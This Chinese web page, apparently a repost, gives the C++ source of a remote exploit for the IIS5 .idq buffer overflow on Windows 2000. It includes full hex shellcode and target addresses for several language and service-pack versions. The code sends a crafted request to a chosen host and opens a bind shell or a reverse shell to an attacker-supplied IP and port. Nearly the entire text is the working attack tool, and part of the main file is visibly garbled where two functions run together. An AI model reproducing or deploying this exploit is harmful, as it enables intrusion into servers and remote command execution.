分享
 
 
 

IIS5_IDQ命令行溢出程序源代码

王朝vc·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  

IIS5_IDQ溢出。。。从Internet上学习到的,也让他回归internet.

文件结构:

cpp文件: iisidqoverflow.cpp 和 SkShellCodeFunc.cpp

头文件: SkShellCodeFunc.h

功能文件: WSAStart.cpp和SnakeSocket.cpp wsastart.h snakesocket.h(这4个文件不提供...因为,他们实现的只是WSAStart和socket的功能,你要成功编译本程序,必须自己替换相关的WSAStart和socket功能的代码.特此声明!)

中间文件: iis_idq.asm --用来实现shellcode数据的文件,编译的时候,不必编译,只是为了中间产生shellcode数据.它实现了溢出后,程序的处理:创建一个进程,并且绑定一个端口。这个还可以用于其他的windows溢出.

文件1:iisidqoverflow.cpp (主文件)

#include <afxwin.h>

#include "snakesocket.h"

#include "wsastart.h"

#include "SkShellCodeFunc.h"

//function predeclare.

//取得 需要 地址 信息

void GetNecesProcAddr( char *szInfo, int iMaxSize);

//生成我的 shell code代码.

int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd);

//宣示帮助.

void ShowHelp()

{

int i;

printf("运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>\r\n");

printf(" 或者: 操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 <输入命令1>\r\n");

printf("\r\n\r\n 其中,如果输入命令参数没有输入,那么,默认为:\"cmd.exe /c + dir\"");

printf("\r\n 如果为1,那么,将输入新的命令.");

printf("\r\n\r\n支持的操作系统 类型: ----\r\n");

for( i=0; i 0){

send( msocket, szBuff, iLen, 0);

}

return (iLen>0)?true:false;

}

int main(int argc, char *argv[])

{

CWSAStart wsaStart;

CSnakeSocket snakeSocket;

WORD wPort;

DWORD dwIP;

if( argc > 1){

if( stricmp( argv[1], "GetAddr") == 0){

char szTemp[12048];

GetNecesProcAddr(szTemp, sizeof(szTemp) );

printf("%s\r\n",szTemp);

OSVERSIONINFO osInfo;

osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

GetVersionEx( &osInfo);

printf("Version: %d - %d. Build:%d. ID:%d\r\n[%s]\r\n",

osInfo.dwMajorVersion, osInfo.dwMinorVersion,

osInfo.dwBuildNumber, osInfo.dwPlatformId,

osInfo.szCSDVersion);

return 0;

}

}

if( argc < 5){

ShowHelp();

return 0;

}

wsaStart.StartUP();

SYSTEM_TYPE SystemType = (SYSTEM_TYPE)atoi(argv[1]);

if( SystemType >= MAX_SYSTEM_TYPE_NUM){

printf("操作系统类型 不正确.\r\n");

ShowHelp();

return 0;

}

dwIP = snakeSocket.GetHostAddr( argv[2]);

if( dwIP == 0){

printf("输入地址不对.\r\n");

return 0;

}

Sk_ConnectType connectType;

ConnectStruct connectStruct;

char szCommand[129]="cmd.exe /c dir c:\\";

BOOL bInputCommand=false;

connectType = (Sk_ConnectType)atoi(argv[4]);

connectStruct.byConnectType = connectType;

switch(connectType){

case LISTEN_ON_PORT:

connectStruct.wListenPort = atoi(argv[5]);

if( argc >= 7){

bInputCommand = true;

}

break;

case CONNECT_TO_HOST:

if( argc < 6){

printf("参数不足够.\r\n");

return 0;

}

connectStruct.dwConnectIP = snakeSocket.GetHostAddr(argv[5]);

connectStruct.wConnectPort = atoi(argv[6]);

if( argc >= 8){

bInputCommand = true;

}

break;

default:

printf("溢出类型不正确.\r\n");

return 0;

}

if( bInputCommand){

printf("\r\n请输入绑定的命令:");

scanf( "%s",szCommand);

}

snakeSocket.CreateSocket();

wPort = atoi(argv[3]);

if( !snakeSocket.connect( argv[2], wPort)){

printf("连接目的机器 %s:%d 失败.\r\n", argv[2], wPort);

return 0;

}

else

printf("连接目的机器 %s:%d OK.\r\n", argv[2], wPort);

BOOL bValue = SendIDQExploit( snakeSocket.m_Socket, SystemType, &connectStruct, szCommand);

if( bValue){

printf( "发送shellcode 到 %s:%d OK\r\n", argv[2], wPort);

printf(" 现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [%s] 结果了...,good luck.!", szCommand);

}

else{

printf( "发送失败, 对方系统类型不支持\r\n");

}

snakeSocket.CloseSocket();

wsaStart.CleanUP();

return 0;

}

文件2. SkShellCodeFunc.cpp (发送shellcode的文件)

//SkShellCodeFunc.cpp

////////////////////////////////////////////////////////////////////////////////

// shellcode 函数

////////////////////////////////////////////////////////////////////////////////

// start by snake. 2001/7/11

////////////////////////////////////////////////////////////////////////////////

#include <windows.h>

#include "SkShellCodeFunc.h"

//搜索JUMP_EBX的地址

WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount);

static const char szSystemName[MAX_SYSTEM_TYPE_NUM+1][60]=

{

"IIS5中文Win2k Sp0",

"IIS5中文Win2k Sp1",

"IIS5中文Win2k Sp2",

"IIS5 English Win2k Sp0",

"IIS5 English Win2k Sp1",

"--IIS5 English Win2k Sp2",

"IIS5 Japanese Win2k Sp0",

"IIS5 Japanese Win2k Sp1",

"--IIS5 Japanese Win2k Sp2",

"IIS5 Mexico Win2k",

"--IIS5 Mexico Win2k sp1",

"--IIS5 Mexico Win2k sp2",

"Unknown..",

};

//取得一个系统的名字.

LPCTSTR GetSystemName( SYSTEM_TYPE type)

{

if( type > MAX_SYSTEM_TYPE_NUM) type = MAX_SYSTEM_TYPE_NUM;

return szSystemName[type];

}

typedef struct _Call_Func_Addr{

DWORD dwGetModuleHandle;

DWORD dwGetProcAddress;

DWORD dwRetJmpEbxAddr;

}Call_Func_Addr;

//2个函数的地址(不通的系统有不通的地址)

static const Call_Func_Addr AllSystemFuncAddr[MAX_SYSTEM_TYPE_NUM]=

{

{ 0x77e756db, 0x77e7564b, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP0

{ 0x77e6380e, 0x77e67031, 0x77E4BF17}, //IIS5_WIN2K_CHINESE_SP1

{ 0x77e66c42, 0x77e69ac1, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP2

{ 0x77E956DB, 0x77E9564B, 0x77E6F533}, //IIS5_WIN2K_ENGLISH_SP0

{ 0x77E8380E, 0x77E87031, 0x77E6E52B}, //IIS5_WIN2K_ENGLISH_SP1

{ 0, 0}, //IIS5_WIN2K_ENGLISH_SP2

{ 0x77E656DB, 0x77E6564B, 0x77E3AF17}, //IIS5_WIN2K_JAPANESE_SP0,

{ 0x77E5380E, 0x77E57031, 0x77E3BCAF}, //IIS5_WIN2K_JAPANESE_SP1,

{ 0, 0}, //IIS5_WIN2K_JAPANESE_SP2,

{ 0x77E956DB, 0x77E9564B, 0x77E596D2 },//IIS_WIN2K_MEXICO_SP0,

{ 0, 0, 0 },//IIS_WIN2K_MEXICO_SP0,

{ 0, 0, 0 },//IIS_WIN2K_MEXICO_SP0,

};

//下面的#define 代码 的分析,是从isno的文章里面copy到的,thanks isno.

#define IIS5_IDQ_EXCEPTION_OFFSET 234 /* exception handler offset */

static unsigned char forwardjump[]= "%u08eb";

/*这是覆盖异常结构的jmp 08h,用来跳到后面寻址shellcode的那段代码*/

static unsigned char jump_to_shell[]=

"%uC033%uB866%u031F%u0340%u8BD8%u8B03"

"%u6840%uDB33%u30B3%uC303%uE0FF";

/*

跳转到shellcode去,我不一句句的解释了,如果有兴趣可以自己看,

注意每两个字节都是反的,%uC033在转换后变成了\x33\xC0。

*/

//下面的数据,可以绑定shell到一个端口,并且监听.

char szSnakeBindShellCode[]=

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x55\x8B\xEC\x33\xC0\x40\xC1\xE0\x0B\x2B\xE0\xEB\x03\x90\xEB\x4E\xE8\xF9\xFF\xFF\xFF\x55\x8B\xEC\x57\x51\x50\x52\x8B\x7D\x08\x8B\x4D\x0C\x8B\x45\x10\x8B\x55\x14\xF2\xAE\x67\xE3\x06\x4F\x88\x17\x41\xEB\xF5\x5A\x58\x59\x5F\x5D\xC3\x53\x51\x52\x33\xD2\x50\x5B\xC1\xEB\x10\x50\x59\x80\xFF\x01\x74\x02\xFE\xCB\x8A\xC3"

"\x85\xD2\x75\x08\xC1\xE0\x08\x51\x5B\x42\xEB\xEB\x5A\x59\x5B\xC3\xEB\x4F\x55\x8B\xEC\x56\x57\x52\x51\x53\x50\x8B\x7D\x08\x8B\x75\x0C\x33\xDB\x33\xC9\xB1\x80\x03\xF1\x8A\x0E\x46\x51\x8A\x1E\x46\x56\x8B\x45\x10\xFF\xD0\x03\xF3\x33\xC9\x8A\x0E\x46\x51\x8A\x1E\x46\x50\x56\x56\x50\x8B\x4D\x14\xFF\xD1\x89\x07\x83\xC7"

"\x04\x5E\x58\x03\xF3\x59\xE2\xE7\x59\xE2\xD3\x58\x5B\x59\x5A\x5F\x5E\x5D\xC3\xEB\x7C\x55\x8B\xEC\x33\xC0\x66\xB8\xF0\x03\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8D\xBD\xC0\xFC\xFF\xFF\x33\xC0\xB0\x02\x57\x50\x8B\x46\x54\xFF\xD0\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\x38\xFF\xD0\x8B\x55\x0C\x8D\x1A\x8A\x0B\x50\x8D"

"\xBD\x10\xFF\xFF\xFF\x8D\x1F\x33\xC0\xB0\x02\x66\x89\x03\x58\x80\xF9\x01\x75\x69\x50\x50\x8B\x42\x04\xE8\x31\xFF\xFF\xFF\x8B\xC8\x86\xE9\x58\x8D\x5F\x02\x8B\x55\x0C\x66\x89\x0B\x33\xC0\x8D\x5F\x04\x89\x03\x58\x50\x33\xC9\xB1\x10\x51\x57\x50\x8B\x46\x3C\xFF\xD0\xEB\x02\xEB\x4D\x58\x50\x33\xC9\x41\x51\x50\x8B\x46"

"\x40\xFF\xD0\x58\x50\x33\xC9\xB1\x10\x8D\xBD\x40\xFF\xFF\xFF\x89\x0F\x57\x8D\xBD\x10\xFF\xFF\xFF\x57\x50\x8B\x46\x44\xFF\xD0\x5A\x50\x52\x8B\x46\x58\xFF\xD0\x58\x83\xF8\xFF\x74\x7A\xEB\x53\x50\x8B\x42\x10\xE8\xC9\xFE\xFF\xFF\x8B\xC8\x86\xE9\x8D\x5F\x02\x66\x89\x0B\xEB\x02\xEB\x6A\x8B\x42\x08\xE8\xB3\xFE\xFF\xFF"

"\x8B\xC8\xC1\xE1\x10\x8B\x42\x0C\xE8\xA6\xFE\xFF\xFF\x66\x8B\xC8\x8D\x5F\x04\x89\x0B\x58\x50\x33\xC9\xB1\x10\x51\x57\x50\x8B\x46\x5C\xFF\xD0\x8B\xC8\x58\x67\xE3\x0B\x90\x50\x8B\x46\x58\xFF\xD0\x33\xC0\xEB\x25\x50\x50\x5A\x8D\xBD\x10\xFF\xFF\xFF\x33\xC0\xB0\x01\x89\x07\xC1\xE0\x02\x50\x57\x66\xB8\x06\x10\x50\x66"

"\xB8\xFF\xFF\x50\x52\x8B\x46\x50\xFF\xD0\x58\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x62\x55\x8B\xEC\x57\x56\x52\x51\x53\x50\x8B\x7D\x0C\x57\x5A\x33\xC0\x8D\x7F\x24\x57\x33\xC9\xB1\x44\xF3\xAA\x5F\x8D\x37\xB1\x44\x89\x0E\x8D\x77\x2C\x66\xB9\x01\x01\x89\x0E\x57\x8D\x7F\x38\x8D\x72\x0C\x8B\x06\x89\x07\x5F\x57\x8D"

"\x7F\x3C\x8D\x72\x04\x8B\x06\x89\x07\x5F\x8B\x75\x08\x8B\x46\x30\xFF\xD0\x33\xC9\x51\x41\x51\x41\x51\x8D\x57\x40\x52\x50\x56\x8B\x75\x0C\x8D\x76\x04\x8B\x1E\x5E\xEB\x02\xEB\x42\x53\x50\x8B\x46\x2C\xFF\xD0\x33\xC0\x8B\x7D\x0C\x8D\x57\x14\x52\x8D\x57\x24\x52\x50\x50\x50\x40\x50\x48\x50\x50\x8B\x55\x10\x52\x50\x8B"

"\x46\x0C\xFF\xD0\x8B\x47\x0C\x50\x8B\x46\x34\xFF\xD0\x8B\x47\x04\x50\x8B\x46\x34\xFF\xD0\x58\x5B\x59\x5A\x5E\x5F\x8B\xE5\x5D\xC3\xEB\x33\x55\x8B\xEC\x56\x57\x52\x51\x53\x50\x8B\x75\x08\x8B\x7D\x0C\x8B\x47\x10\x50\x8B\x46\x58\xFF\xD0\x8B\x07\x50\x8B\x46\x34\xFF\xD0\x8B\x47\x08\x50\x8B\x46\x34\xFF\xD0\x58\x5B\x59"

"\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x77\x55\x8B\xEC\x33\xC0\x66\xB8\xF0\x02\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8B\x7D\x0C\x8D\x55\xF8\x33\xC0\x40\x89\x02\x8D\x55\xF8\x8B\x02\x85\xC0\x74\x2A\x33\xC0\x50\xB0\xF0\x50\x8D\x85\x08\xFF\xFF\xFF\x50\x8D\x5F\x10\x8B\x03\x50\x8B\x46\x4C\xFF\xD0\x83\xF8\xFF\x75\x0F\x50"

"\x5A\x8B\x46\x28\xFF\xD0\x66\x3D\x4C\x27\x74\x28\xEB\x7F\x85\xC0\x74\x7B\x7E\x20\x33\xD2\x52\x8D\x5D\xFC\x53\x50\x8D\x9D\x08\xFF\xFF\xFF\x53\x8B\x47\x08\x50\x8B\x46\x18\xFF\xD0\x85\xC0\x74\x5D\xEB\x02\xEB\x62\x33\xC0\x50\x8D\x55\xFC\x52\x50\x50\x50\x8B\x07\x50\x8B\x46\x10\xFF\xD0\x8B\x45\xFC\x85\xC0\x74\x3B\x33"

"\xC0\x50\x8D\x55\xFC\x52\xB0\xF0\x50\x8D\x95\x08\xFF\xFF\xFF\x52\x8B\x07\x50\x8B\x46\x1C\xFF\xD0\x85\xC0\x74\x23\x33\xC0\x50\x8B\x45\xFC\x50\x8D\x95\x08\xFF\xFF\xFF\x52\x8B\x47\x10\x50\x8B\x46\x48\xFF\xD0\x83\xF8\xFF\x74\x07\xEB\xAC\xE9\x4C\xFF\xFF\xFF\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x72\x55\x8B\xEC\x33"

"\xC0\xB0\xF0\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8B\x7D\x0C\x33\xDB\x8D\x7D\xF0\x8D\x57\x04\x89\x1A\x8D\x57\x08\x43\x89\x1A\x8D\x17\xB3\x0C\x89\x1A\x33\xDB\x57\x53\x57\x8B\x7D\x0C\x8D\x57\x04\x89\x1A\x52\x8D\x17\x52\x8B\x46\x04\xFF\xD0\x5F\x85\xC0\x74\x1F\x33\xDB\x53\x57\x8B\x7D\x0C\x8D\x57\x08\x52\x8D\x57"

"\x0C\x89\x1A\x52\x8B\x46\x04\xFF\xD0\x85\xC0\x74\x05\x33\xC0\x40\xEB\x05\x33\xC0\xEB\x01\x90\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\x8D\x34\x24\x8B\x36\x33\xC9\x66\xB9\xCC\x04\x03\xF1\x8D\xBD\x30\xFE\xFF\xFF\x57\x66\xB9\xFA\x01\xF3\xA4\x5F\x57\x33\xC9\x51\xB1\x2B\x51\x66\xB9\xE6\x01\x51\x33\xDB\xB3\x14\x03\xFB\x57"

"\xE8\xCC\xFB\xFF\xFF\x83\xC4\x10\x33\xC9\x66\xB9\xDD\x01\x8B\xF7\x03\xF1\x8B\x46\x04\x50\x8B\x06\x50\x57\x8D\xB5\x30\xFD\xFF\xFF\x56\xE8\xF6\xFB\xFF\xFF\x83\xC4\x10\x5F\x57\x56\xE8\x3C\xFC\xFF\xFF\x83\xC4\x08\x85\xC0\x74\x57\x8D\xBD\x10\xFC\xFF\xFF\x8D\x5F\x10\x89\x03\x57\x56\xE8\x16\xFF\xFF\xFF\x83\xC4\x08\x85"

"\xC0\x74\x3E\x8D\xBD\x30\xFE\xFF\xFF\x33\xC0\xB0\x14\x03\xF8\x57\x8D\xBD\x10\xFC\xFF\xFF\x57\x56\xE8\x3B\xFD\xFF\xFF\x83\xC4\x0C\x57\x56\xE8\x0E\xFE\xFF\xFF\x83\xC4\x08\x57\x56\xE8\xCF\xFD\xFF\xFF\x83\xC4\x08\x33\xC0\x50\x8D\x57\x14\x8B\x02\x50\x8B\x06\xFF\xD0\x33\xC0\x50\x8B\x46\x24\xFF\xD0\xC3\x8B\xE5\x5D\x90"

"\x90\x02\xFF\xFF\xFF\x51\x01\x01\x02\x01\x02\x25\x01\xC0\x01\xA8\x01\x58\x01\x01\x02\x63\x6D\x64\x2E\x65\x78\x65\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B"

"\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x02\x0E\x6B\x65\x72\x6E\x65"

"\x6C\x33\x32\x2E\x64\x6C\x6C\x2B\x2B\x0E\x11\x54\x65\x72\x6D\x69\x6E\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x2B\x0B\x43\x72\x65\x61\x74\x65\x50\x69\x70\x65\x2B\x10\x47\x65\x74\x53\x74\x61\x72\x74\x75\x70\x49\x6E\x66\x6F\x41\x2B\x0F\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x41\x2B\x0E\x50\x65\x65\x6B"

"\x4E\x61\x6D\x65\x64\x50\x69\x70\x65\x2B\x0C\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x2B\x0B\x57\x72\x69\x74\x65\x46\x69\x6C\x65\x2B\x2B\x09\x52\x65\x61\x64\x46\x69\x6C\x65\x2B\x06\x53\x6C\x65\x65\x70\x2B\x0C\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x2B\x0E\x47\x65\x74\x4C\x61\x73\x74\x45\x72\x72\x6F\x72"

"\x2B\x2B\x10\x44\x75\x70\x6C\x69\x63\x61\x74\x65\x48\x61\x6E\x64\x6C\x65\x2B\x12\x47\x65\x74\x43\x75\x72\x72\x65\x6E\x74\x50\x72\x6F\x63\x65\x73\x73\x2B\x0C\x43\x6C\x6F\x73\x65\x48\x61\x6E\x64\x6C\x65\x2B\x0B\x77\x73\x32\x5F\x33\x32\x2E\x64\x6C\x6C\x2B\x0B\x07\x73\x6F\x63\x6B\x65\x74\x2B\x05\x62\x69\x6E\x64\x2B"

"\x07\x6C\x69\x73\x74\x65\x6E\x2B\x07\x61\x63\x63\x65\x70\x74\x2B\x05\x73\x65\x6E\x64\x2B\x05\x72\x65\x63\x76\x2B\x0B\x73\x65\x74\x73\x6F\x63\x6B\x6F\x70\x74\x2B\x0B\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x2B\x0C\x63\x6C\x6F\x73\x65\x73\x6F\x63\x6B\x65\x74\x2B\x08\x63\x6F\x6E\x6E\x65\x63\x74\x2B\x0C\x67\x65\x74"

"\x68\x6F\x73\x74\x6E\x61\x6D\x65\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\xDB\x56\xE7\x77\x4B\x56\xE7\x77\x00";

//我的私有信息:

static const char szSnakeSign[]="snake_program_code_v2.0";

#define PREHEAD_NOP_SIZE 0x24

#define dwConnectType_Offset 1249+PREHEAD_NOP_SIZE

#define dwListenPort_Offset 1253+PREHEAD_NOP_SIZE

#define dwConnectIP1_Offset 1257+PREHEAD_NOP_SIZE

#define dwConnectIP2_Offset 1261+PREHEAD_NOP_SIZE

#define dwConnectPort_Offset 1265+PREHEAD_NOP_SIZE

#define dwExecCommand_Offset 1269+PREHEAD_NOP_SIZE

#define wExecCommandSize 128

#define dwGetModuleHandle_Offset 1746+PREHEAD_NOP_SIZE

#define dwGetProcAddress_Offset 1750+PREHEAD_NOP_SIZE

BYTE byReservedValue[]={ 0, 0x0a, 0x0d};

;//转换标准word -> snake ShellCode Reserve Value.

;//该 byte == 0, 0x0a, 0x0d,那么,高位为2. 低位 +1.

;// 高位 为1,低位不变.

DWORD Convert_Ansi_Word_To_Sk_Long(WORD wValue)

{

int iReservCount, i;

WORD wTemp;

DWORD dwRetValue = 0;

BOOL bFirst=true;

iReservCount = sizeof(byReservedValue)/sizeof(BYTE);

while(1){

wTemp = wValue&0xff00;

wTemp >>= 8;

for( i=0; i<iReservCount; i++){

if( wTemp == byReservedValue[i]) break;

}

if( i == iReservCount)

wTemp |= 0x0100;

else{

wTemp++;

wTemp |= 0x0200;

}

dwRetValue |= wTemp;

if( bFirst){

bFirst = false;

dwRetValue <<= 16;

wValue <<=8;

}

else

break;

}

return dwRetValue;

}

typedef void (*SkRunPointer)();

//生成我的 IIS5 idq shell code代码.

int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd)

{

char szBuf[2048];

char szOutput[10000], szCreateCode[10000];

char *p;

DWORD dwGetModuleHandle = 0, dwGetProcAddress=0, dwRetJmpEbx=0;

WORD wSelectValue = MAX_SYSTEM_TYPE_NUM;

switch( SystemType){

case IIS5_WIN2K_CHINESE_SP0:

wSelectValue = IIS5_WIN2K_CHINESE_SP0;

break;

case IIS5_WIN2K_CHINESE_SP1:

wSelectValue = IIS5_WIN2K_CHINESE_SP1;

break;

case IIS5_WIN2K_CHINESE_SP2:

wSelectValue = IIS5_WIN2K_CHINESE_SP2;

break;

case IIS5_WIN2K_ENGLISH_SP0:

wSelectValue = IIS5_WIN2K_ENGLISH_SP0;

break;

case IIS5_WIN2K_ENGLISH_SP1:

wSelectValue = IIS5_WIN2K_ENGLISH_SP1;

break;

case IIS5_WIN2K_ENGLISH_SP2:

break;

case IIS5_WIN2K_JAPANESE_SP0:

wSelectValue = IIS5_WIN2K_JAPANESE_SP0;

break;

case IIS5_WIN2K_JAPANESE_SP1:

wSelectValue = IIS5_WIN2K_JAPANESE_SP1;

break;

case IIS5_WIN2K_JAPANESE_SP2:

wSelectValue = IIS5_WIN2K_JAPANESE_SP2;

break;

case IIS_WIN2K_MEXICO_SP0:

wSelectValue = IIS_WIN2K_MEXICO_SP0;

break;

case IIS_WIN2K_MEXICO_SP1:

wSelectValue = IIS_WIN2K_MEXICO_SP1;

break;

case IIS_WIN2K_MEXICO_SP2:

wSelectValue = IIS_WIN2K_MEXICO_SP2;

break;

default:

break;

}

if( wSelectValue >= MAX_SYSTEM_TYPE_NUM) return 0;

dwGetModuleHandle = AllSystemFuncAddr[wSelectValue].dwGetModuleHandle;

dwGetProcAddress = AllSystemFuncAddr[wSelectValue].dwGetProcAddress;

dwRetJmpEbx = AllSystemFuncAddr[wSelectValue].dwRetJmpEbxAddr;

if( dwGetModuleHandle == 0) return 0;

memset( szBuf, 1, sizeof(szBuf));

memcpy( szBuf, szSnakeSign, strlen(szSnakeSign));

p = &(szBuf[IIS5_IDQ_EXCEPTION_OFFSET-2]);

wsprintf( p,"%s", forwardjump);

p += strlen((char *)forwardjump);

*p++ = 1;

*p++ = '%';

*p++ = 'u';

wsprintf( p, "%04x", (dwRetJmpEbx>>0)&0xffff);

p += 4;

*p ++ = '%';

*p ++ = 'u';

wsprintf( p, "%04x", (dwRetJmpEbx>>16)&0xffff);

p += 4;

*p++ = 1;

wsprintf( p, "%s", jump_to_shell);

//wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0\r\nShell: %s\r\n\r\n", szBuf, szMyCode);

wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0\r\nSnake: ", szBuf);

memcpy( szCreateCode, szSnakeBindShellCode, sizeof(szSnakeBindShellCode));

//将地址信息, 端口信息 写入 shellcode代码.

DWORD *pdw, dwTemp;

WORD wTemp;

char *lpsz, szExecTemp[wExecCommandSize];

//Init Value.

switch( pConnectStruct->byConnectType){

case LISTEN_ON_PORT:

szCreateCode[dwConnectType_Offset] = LISTEN_ON_PORT;

dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct->wListenPort);

lpsz = &( szCreateCode[dwListenPort_Offset]);

pdw = (DWORD *)lpsz;

*pdw = dwTemp; //set listen port.

break;

case CONNECT_TO_HOST:

szCreateCode[dwConnectType_Offset] = CONNECT_TO_HOST;

wTemp = (WORD)( (pConnectStruct->dwConnectIP) & 0xffff);

dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);

lpsz = &( szCreateCode[dwConnectIP2_Offset]);

pdw = (DWORD *)lpsz;

*pdw = dwTemp; //set IP1.

wTemp = (WORD)( ((pConnectStruct->dwConnectIP) & 0xffff0000) >> 16);

dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);

lpsz = &( szCreateCode[dwConnectIP1_Offset]);

pdw = (DWORD *)lpsz;

*pdw = dwTemp; //set IP2.

dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct->wConnectPort);

lpsz = &( szCreateCode[dwConnectPort_Offset]);

pdw = (DWORD *)lpsz;

*pdw = dwTemp; //set connect Port.

break;

default:

return 0;

}

lpsz = &( szCreateCode[dwGetModuleHandle_Offset]);

pdw = (DWORD *)lpsz;

*pdw = dwGetModuleHandle; //set dwGetModuleHandle.

lpsz = &( szCreateCode[dwGetProcAddress_Offset]);

pdw = (DWORD *)lpsz;

*pdw = dwGetProcAddress; //set dwGetProcAddress.

memset( szExecTemp, '+', wExecCommandSize);

wTemp = strlen( lpszBindCmd);

if(wTemp >= wExecCommandSize)

wTemp = wExecCommandSize-1;

strncpy( szExecTemp, lpszBindCmd, wTemp);

lpsz = &( szCreateCode[dwExecCommand_Offset]);

memcpy( lpsz, szExecTemp, wExecCommandSize);

strcat( szOutput, szCreateCode);

strcat( szOutput, "\r\n\r\n");

strcpy( pszOutput, szOutput);

return strlen( pszOutput);

}

//取得 需要 地址 信息

void GetNecesProcAddr( char *szInfo, int iMaxSize)

{

HANDLE hModule = GetModuleHandle("kernel32");

DWORD dwAddr_GetHandle, dwAddr_GetProcAddr;

char szOutput[11024], szJmpAddr[8124], szOne[20];

DWORD dwJmpEbx[100];

WORD wGetJmpCount,w;

wGetJmpCount = Search_Jump_Ebx_Code(dwJmpEbx, 100);

szJmpAddr[0] = 0;

for( w=0; w<wGetJmpCount; w++){

wsprintf( szOne," 0x%X", dwJmpEbx[w]);

strcat( szJmpAddr, szOne);

}

dwAddr_GetHandle = (DWORD)GetProcAddress( (HINSTANCE)hModule,"GetModuleHandleA");

dwAddr_GetProcAddr = (DWORD)GetProcAddress( (HINSTANCE)hModule, "GetProcAddress");

wsprintf( szOutput,"Addr1: 0x%X; Addr2: 0x%X\r\nJJ:%s",

dwAddr_GetHandle, dwAddr_GetProcAddr, szJmpAddr);

//MessageBox( NULL, szOutput, "topic", MB_OK);

strncpy( szInfo, szOutput, iMaxSize);

szInfo[iMaxSize-1] = 0;

}

#define JUMP_EBX_CODE 0xe3ff

//搜索JUMP_EBX的地址

WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount)

{

HANDLE hDllModule = GetModuleHandle("user32");

char *pValue;

WORD wTemp = JUMP_EBX_CODE;

DWORD dwMin = (DWORD)hDllModule,dwMax;

WORD wCount = 0;

pValue = (char*)dwMin;

wCount = 0;

dwMax = dwMin + 400000; //size is 39kb.

while( ( (DWORD)pValue) < dwMax){

if( *((WORD *)pValue) == JUMP_EBX_CODE){

dwArray[wCount++] = (DWORD)pValue;

if( wCount >= wMaxCount) break;

}

pValue++;

}

return wCount;

}

文件3. SkShellCodeFunc.h -- 必须的头文件

//SkShellCodeFunc.h

////////////////////////////////////////////////////////////////////////////////

// header file for 定义shellcode 函数

////////////////////////////////////////////////////////////////////////////////

// start by snake. 2001/7/11

////////////////////////////////////////////////////////////////////////////////

#ifndef _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11

#define _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11

enum SYSTEM_TYPE{

IIS5_WIN2K_CHINESE_SP0,

IIS5_WIN2K_CHINESE_SP1,

IIS5_WIN2K_CHINESE_SP2,

IIS5_WIN2K_ENGLISH_SP0,

IIS5_WIN2K_ENGLISH_SP1,

IIS5_WIN2K_ENGLISH_SP2,

IIS5_WIN2K_JAPANESE_SP0,

IIS5_WIN2K_JAPANESE_SP1,

IIS5_WIN2K_JAPANESE_SP2,

IIS_WIN2K_MEXICO_SP0,

IIS_WIN2K_MEXICO_SP1,

IIS_WIN2K_MEXICO_SP2,

MAX_SYSTEM_TYPE_NUM,

};

enum Sk_ConnectType{ CONNECTTYPE_NONE=0, LISTEN_ON_PORT=1, CONNECT_TO_HOST, MAX_CONNECT_TYPE};

typedef struct _ConnectStruct{

BYTE byConnectType;

WORD wListenPort;

DWORD dwConnectIP;

WORD wConnectPort;

}ConnectStruct;

//取得一个系统的名字.

LPCTSTR GetSystemName( SYSTEM_TYPE type);

